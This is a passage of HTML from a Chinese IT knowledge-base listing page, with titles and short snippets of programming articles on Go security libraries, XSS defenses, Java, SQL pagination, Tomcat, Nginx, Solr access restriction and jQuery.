class="tag" taget="_blank" href="/search/Golang%E6%98%9F%E8%BE%B0%E5%9B%BE/1.htm">Golang星辰图</a><a class="tag" taget="_blank" href="/search/golang/1.htm">golang</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>加固你的代码：了解Go语言中的安全库和技术前言在当今数字化的世界中，保护代码和数据的安全性变得至关重要。恶意攻击、数据泄露和其他安全漏洞可能给我们的系统和用户带来巨大的风险和损失。为了增强软件的安全性和可靠性，我们需要利用现有的安全库来加固我们的应用程序和系统。本文将介绍一些常用的Go语言安全库，并提供详细的功能介绍和使用示例，帮助读者加强自己的代码和数据的安全性。欢迎订阅专栏：Golang星辰图</div> </li> <li><a href="/article/1771762748837920768.htm" title="XSS四-WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发" target="_blank">XSS四-WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发</a> 爱敲键盘的pig <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>演示案例：XSS跨站-安全防御-CSPXSS跨站-安全防御-HttpOnlyXSS跨站-安全防御-XSSFilter1.CSP(Content Security Policy 内容安全策略)内容安全策略是一种可信白名单机制，来限制网站中是否可以包含某来源内容。该制度明确告诉客户端，哪些外部资源可以加载和执行，等同于提供白名单，它的实现和执行全部由浏览器完成，开发者只需提供配置。禁止加载外域代码，防</div> </li> <li><a href="/article/81.htm" title="java短路运算符和逻辑运算符的区别" target="_blank">java短路运算符和逻辑运算符的区别</a> 3213213333332132 <a class="tag" taget="_blank" href="/search/java%E5%9F%BA%E7%A1%80/1.htm">java基础</a> <div> /* * 逻辑运算符——不论是什么条件都要执行左右两边代码 * 短路运算符——我认为在底层就是利用物理电路的“并联”和“串联”实现的 * 原理很简单，并联电路代表短路或（||），串联电路代表短路与（&&）。 * * 并联电路两个开关只要有一个开关闭合，电路就会通。 * 类似于短路或（||），只要有其中一个为true（开关闭合）是</div> </li> <li><a href="/article/208.htm" title="Java异常那些不得不说的事" target="_blank">Java异常那些不得不说的事</a> 白糖_ <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/exception/1.htm">exception</a> <div>一、在finally块中做数据回收操作比如数据库连接都是很宝贵的，所以最好在finally中关闭连接。 JDBCAgent jdbc = new JDBCAgent(); try{ jdbc.excute("select * from ctp_log"); }catch(SQLException e){ ... }finally{ jdbc.close(); </div> </li> <li><a href="/article/335.htm" title="utf-8与utf-8(无BOM)的区别" target="_blank">utf-8与utf-8(无BOM)的区别</a> dcj3sjt126com <a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a> <div>BOM——Byte Order Mark，就是字节序标记   在UCS 编码中有一个叫做"ZERO WIDTH NO-BREAK SPACE"的字符，它的编码是FEFF。而FFFE在UCS中是不存在的字符，所以不应该出现在实际传输中。UCS规范建议我们在传输字节流前，先传输字符"ZERO WIDTH NO-BREAK SPACE"。这样如</div> </li> <li><a href="/article/462.htm" title="JAVA Annotation之定义篇" target="_blank">JAVA Annotation之定义篇</a> 周凡杨 <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%B3%A8%E8%A7%A3/1.htm">注解</a><a class="tag" taget="_blank" href="/search/annotation/1.htm">annotation</a><a class="tag" taget="_blank" href="/search/%E5%85%A5%E9%97%A8/1.htm">入门</a><a class="tag" taget="_blank" href="/search/%E6%B3%A8%E9%87%8A/1.htm">注释</a> <div>    Annotation: 译为注释或注解 An annotation, in the Java computer programming language, is a form of syntactic metadata that can be added to Java source code. Classes, methods, variables, pa</div> </li> <li><a href="/article/589.htm" title="tomcat的多域名、虚拟主机配置" target="_blank">tomcat的多域名、虚拟主机配置</a> g21121 <a class="tag" taget="_blank" href="/search/tomcat/1.htm">tomcat</a> <div>众所周知apache可以配置多域名和虚拟主机，而且配置起来比较简单，但是项目用到的是tomcat，配来配去总是不成功。查了些资料才总算可以，下面就跟大家分享下经验。很多朋友搜索的内容基本是告诉我们这么配置：在Engine标签下增面积Host标签，如下： <Host name="www.site1.com" appBase="webapps"</div> </li> <li><a href="/article/716.htm" title="Linux SSH 错误解析（Capistrano 的cap 访问错误 Permission ）" target="_blank">Linux SSH 错误解析（Capistrano 的cap 访问错误 Permission ）</a> 510888780 <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/capistrano/1.htm">capistrano</a> <div> 1.ssh -v hdfs@192.168.18.133 出现 Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password). 错误运行状况如下： OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 debug1: Reading configuratio</div> </li> <li><a href="/article/843.htm" title="log4j的用法" target="_blank">log4j的用法</a> Harry642 <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/log4j/1.htm">log4j</a> <div>一、前言：     log4j 是一个开放源码项目，是广泛使用的以Java编写的日志记录包。由于log4j出色的表现，     当时在log4j完成时，log4j开发组织曾建议sun在jdk1.4中用log4j取代jdk1.4 的日志工具类，但当时jdk1.4已接近完成，所以sun拒绝使用log4j，当在java开发中</div> </li> <li><a href="/article/970.htm" title="mysql、sqlserver、oracle分页，java分页统一接口实现" target="_blank">mysql、sqlserver、oracle分页，java分页统一接口实现</a> aijuans <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/jave/1.htm">jave</a> <div> 定义：pageStart 起始页，pageEnd 终止页,pageSize页面容量 oracle分页：　　　　select * from ( select mytable.*,rownum num from (实际传的SQL) where rownum<=pageEnd) where num>=pageStart sqlServer分页： &nbsp</div> </li> <li><a href="/article/1097.htm" title="Hessian 简单例子" target="_blank">Hessian 简单例子</a> antlove <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/service/1.htm">service</a><a class="tag" taget="_blank" href="/search/hessian/1.htm">hessian</a> <div>hello.hessian.MyCar.java package hessian.pojo; import java.io.Serializable; public class MyCar implements Serializable { private static final long serialVersionUID = 473690540190845543</div> </li> <li><a href="/article/1224.htm" title="数据库对象的同义词和序列" target="_blank">数据库对象的同义词和序列</a> 百合不是茶 <a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E5%BA%8F%E5%88%97/1.htm">序列</a><a class="tag" taget="_blank" href="/search/%E5%90%8C%E4%B9%89%E8%AF%8D/1.htm">同义词</a><a class="tag" taget="_blank" href="/search/ORACLE%E6%9D%83%E9%99%90/1.htm">ORACLE权限</a> <div>回顾简单的数据库权限等命令; 解锁用户和锁定用户 alter user scott account lock/unlock; //system下查看系统中的用户 select * dba_users; //创建用户名和密码 create user wj identified by wj; identified by //授予连接权和建表权 grant connect to </div> </li> <li><a href="/article/1351.htm" title="使用Powermock和mockito测试静态方法" target="_blank">使用Powermock和mockito测试静态方法</a> bijian1013 <a class="tag" taget="_blank" href="/search/%E6%8C%81%E7%BB%AD%E9%9B%86%E6%88%90/1.htm">持续集成</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a><a class="tag" taget="_blank" href="/search/mockito/1.htm">mockito</a><a class="tag" taget="_blank" href="/search/Powermock/1.htm">Powermock</a> <div>        实例： package com.bijian.study; import static org.junit.Assert.assertEquals; import java.io.IOException; import org.junit.Before; import org.junit.Test; import or</div> </li> <li><a href="/article/1478.htm" title="精通Oracle10编程SQL(6)访问ORACLE" target="_blank">精通Oracle10编程SQL(6)访问ORACLE</a> bijian1013 <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/plsql/1.htm">plsql</a> <div>/* *访问ORACLE */ --检索单行数据 --使用标量变量接收数据 DECLARE v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; BEGIN select ename,sal into v_ename,v_sal from emp where empno=&no; dbms_output.pu</div> </li> <li><a href="/article/1605.htm" title="【Nginx四】Nginx作为HTTP负载均衡服务器" target="_blank">【Nginx四】Nginx作为HTTP负载均衡服务器</a> bit1129 <a class="tag" taget="_blank" href="/search/nginx/1.htm">nginx</a> <div> Nginx的另一个常用的功能是作为负载均衡服务器。一个典型的web应用系统，通过负载均衡服务器，可以使得应用有多台后端服务器来响应客户端的请求。一个应用配置多台后端服务器，可以带来很多好处：   负载均衡的好处增加可用资源增加吞吐量加快响应速度，降低延时出错的重试验机制 Nginx主要支持三种均衡算法： round-robin l</div> </li> <li><a href="/article/1732.htm" title="jquery-validation备忘" target="_blank">jquery-validation备忘</a> 白糖_ <a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/F%23/1.htm">F#</a><a class="tag" taget="_blank" href="/search/Firebug/1.htm">Firebug</a> <div>留点学习jquery validation总结的代码：   function checkForm(){ validator = $("#commentForm").validate({// #formId为需要进行验证的表单ID errorElement :"span",// 使用"div"标签标记错误，默认:&</div> </li> <li><a href="/article/1859.htm" title="solr限制admin界面访问（端口限制和http授权限制）" target="_blank">solr限制admin界面访问（端口限制和http授权限制）</a> ronin47 <a class="tag" taget="_blank" href="/search/%E9%99%90%E5%AE%9AIp%E8%AE%BF%E9%97%AE/1.htm">限定Ip访问</a> <div>solr的管理界面可以帮助我们做很多事情，但是把solr程序放到公网之后就要限制对admin的访问了。可以通过tomcat的http基本授权来做限制，也可以通过iptables防火墙来限制。我们先看如何通过tomcat配置http授权限制。第一步：在tomcat的conf/tomcat-users.xml文件中添加管理用户，比如： <userusername="ad</div> </li> <li><a href="/article/1986.htm" title="多线程-用JAVA写一个多线程程序，写四个线程，其中二个对一个变量加1，另外二个对一个变量减1" target="_blank">多线程-用JAVA写一个多线程程序，写四个线程，其中二个对一个变量加1，另外二个对一个变量减1</a> bylijinnan <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">多线程</a> <div> public class IncDecThread { private int j=10; /* * 题目:用JAVA写一个多线程程序，写四个线程，其中二个对一个变量加1，另外二个对一个变量减1 * 两个问题： * 1、线程同步--synchronized * 2、线程之间如何共享同一个j变量--内部类 */ public static </div> </li> <li><a href="/article/2113.htm" title="买房历程" target="_blank">买房历程</a> cfyme <div>    2015-06-21: 万科未来城，看房子   2015-06-26: 办理贷款手续，贷款73万，贷款利率5.65=5.3675   2015-06-27: 房子首付,签完合同   2015-06-28，央行宣布降息 0.25，就2天的时间差啊，没赶上。   首付，老婆找他的小姐妹接了5万，另外几个朋友借了1-</div> </li> <li><a href="/article/2240.htm" title="[军事与科技]制造大型太空战舰的前奏" target="_blank">[军事与科技]制造大型太空战舰的前奏</a> comsci <a class="tag" taget="_blank" href="/search/%E5%88%B6%E9%80%A0/1.htm">制造</a> <div>        天气热了........空调和电扇要准备好..........        最近,世界形势日趋复杂化,战争的阴影开始覆盖全世界..........        所以,我们不得不关</div> </li> <li><a href="/article/2367.htm" title="dateformat" target="_blank">dateformat</a> dai_lm <a class="tag" taget="_blank" href="/search/DateFormat/1.htm">DateFormat</a> <div> "Symbol Meaning Presentation Ex." "------ ------- ------------ ----" "G era designator (Text) AD" "y year</div> </li> <li><a href="/article/2494.htm" title="Hadoop如何实现关联计算" target="_blank">Hadoop如何实现关联计算</a> datamachine <a class="tag" taget="_blank" href="/search/mapreduce/1.htm">mapreduce</a><a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a><a class="tag" taget="_blank" href="/search/%E5%85%B3%E8%81%94%E8%AE%A1%E7%AE%97/1.htm">关联计算</a> <div>    选择Hadoop，低成本和高扩展性是主要原因，但但它的开发效率实在无法让人满意。     以关联计算为例。     假设：HDFS上有2个文件，分别是客户信息和订单信息，customerID是它们之间的关联字段。如何进行关联计算，以便将客户名称添加到订单列表中？   &nbs</div> </li> <li><a href="/article/2621.htm" title="用户模型中修改用户信息时，密码是如何处理的" target="_blank">用户模型中修改用户信息时，密码是如何处理的</a> dcj3sjt126com <a class="tag" taget="_blank" href="/search/yii/1.htm">yii</a> <div>当我添加或修改用户记录的时候对于处理确认密码我遇到了一些麻烦，所有我想分享一下我是怎么处理的。场景是使用的基本的那些(系统自带)，你需要有一个数据表(user)并且表中有一个密码字段(password),它使用 sha1、md5或其他加密方式加密用户密码。面是它的工作流程: 当创建用户的时候密码需要加密并且保存，但当修改用户记录时如果使用同样的场景我们最终就会把用户加密过的密码再次加密，这</div> </li> <li><a href="/article/2748.htm" title="中文 iOS/Mac 开发博客列表" target="_blank">中文 iOS/Mac 开发博客列表</a> dcj3sjt126com <a class="tag" taget="_blank" href="/search/Blog/1.htm">Blog</a> <div>  本博客列表会不断更新维护，如果有推荐的博客，请到此处提交博客信息。本博客列表涉及的文章内容支持 定制化Google搜索，特别感谢 JeOam 提供并帮助更新。本博客列表也提供同步更新的OPML文件（下载OPML文件），可供导入到例如feedly等第三方定阅工具中，特别感谢 lcepy 提供自动转换脚本。这里有导入教程。 </div> </li> <li><a href="/article/2875.htm" title="js去除空格，去除左右两端的空格" target="_blank">js去除空格，去除左右两端的空格</a> 蕃薯耀 <a class="tag" taget="_blank" href="/search/%E5%8E%BB%E9%99%A4%E5%B7%A6%E5%8F%B3%E4%B8%A4%E7%AB%AF%E7%9A%84%E7%A9%BA%E6%A0%BC/1.htm">去除左右两端的空格</a><a class="tag" taget="_blank" href="/search/js%E5%8E%BB%E6%8E%89%E6%89%80%E6%9C%89%E7%A9%BA%E6%A0%BC/1.htm">js去掉所有空格</a><a class="tag" taget="_blank" href="/search/js%E5%8E%BB%E9%99%A4%E7%A9%BA%E6%A0%BC/1.htm">js去除空格</a> <div>js去除空格，去除左右两端的空格 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>&g</div> </li> <li><a href="/article/3002.htm" title="SpringMVC4零配置--web.xml" target="_blank">SpringMVC4零配置--web.xml</a> hanqunfeng <a class="tag" taget="_blank" href="/search/springmvc4/1.htm">springmvc4</a> <div>servlet3.0+规范后，允许servlet，filter，listener不必声明在web.xml中，而是以硬编码的方式存在，实现容器的零配置。 ServletContainerInitializer：启动容器时负责加载相关配置 package javax.servlet; import java.util.Set; public interface ServletContainer</div> </li> <li><a href="/article/3129.htm" title="《开源框架那些事儿21》：巧借力与借巧力" target="_blank">《开源框架那些事儿21》：巧借力与借巧力</a> j2eetop <a class="tag" taget="_blank" href="/search/%E6%A1%86%E6%9E%B6/1.htm">框架</a><a class="tag" taget="_blank" href="/search/UI/1.htm">UI</a> <div>同样做前端UI，为什么有人花了一点力气，就可以做好？而有的人费尽全力，仍然错误百出？我们可以先看看几个故事。故事1：巧借力，乌鸦也可以吃核桃有一个盛产核桃的村子，每年秋末冬初，成群的乌鸦总会来到这里，到果园里捡拾那些被果农们遗落的核桃。核桃仁虽然美味，但是外壳那么坚硬，乌鸦怎么才能吃到呢？原来乌鸦先把核桃叼起，然后飞到高高的树枝上，再将核桃摔下去，核桃落到坚硬的地面上，被撞破了，于是，</div> </li> <li><a href="/article/3256.htm" title="JQuery EasyUI 验证扩展" target="_blank">JQuery EasyUI 验证扩展</a> 可怜的猫 <a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/easyui/1.htm">easyui</a><a class="tag" taget="_blank" href="/search/%E9%AA%8C%E8%AF%81/1.htm">验证</a> <div>  最近项目中用到了前端框架-- EasyUI，在做校验的时候会涉及到很多需要自定义的内容，现把常用的验证方式总结出来，留待后用。   以下内容只需要在公用js中添加即可。   使用类似于如下： <input class="easyui-textbox" name="mobile" id="mobile&</div> </li> <li><a href="/article/3383.htm" title="架构师之httpurlconnection----------读取和发送(流读取效率通用类)" target="_blank">架构师之httpurlconnection----------读取和发送(流读取效率通用类)</a> nannan408 <div>1.前言.    如题. 2.代码. /* * Copyright (c) 2015, S.F. Express Inc. All rights reserved. */ package com.test.test.test.send; import java.io.IOException; import java.io.InputStream</div> </li> <li><a href="/article/3510.htm" title="Jquery性能优化" target="_blank">Jquery性能优化</a> r361251 <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a> <div>一、注意定义jQuery变量的时候添加var关键字这个不仅仅是jQuery，所有javascript开发过程中，都需要注意，请一定不要定义成如下： $loading = $('#loading'); //这个是全局定义，不知道哪里位置倒霉引用了相同的变量名，就会郁闷至死的二、请使用一个var来定义变量如果你使用多个变量的话，请如下方式定义： . 代码如下: var page </div> </li> <li><a href="/article/3637.htm" title="在eclipse项目中使用maven管理依赖" target="_blank">在eclipse项目中使用maven管理依赖</a> tjj006 <a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a><a class="tag" taget="_blank" href="/search/maven/1.htm">maven</a> <div>概览: 如何导入maven项目至eclipse中建立自有Maven  Java类库服务器建立符合maven代码库标准的自定义类库 Maven在管理Java类库方面有巨大的优势，像白衣所说就是非常“环保”。我们平时用IDE开发都是把所需要的类库一股脑的全丢到项目目录下，然后全部添加到ide的构建路径中，如果用了SVN/CVS，这样会很容易就把</div> </li> <li><a href="/article/3764.htm" title="中国天气网省市级联页面" target="_blank">中国天气网省市级联页面</a> x125858805 <a class="tag" taget="_blank" href="/search/%E7%BA%A7%E8%81%94/1.htm">级联</a> <div>1、页面及级联js <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> &l</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> 按字母分类： <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.  </div> </div> </footer>  <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>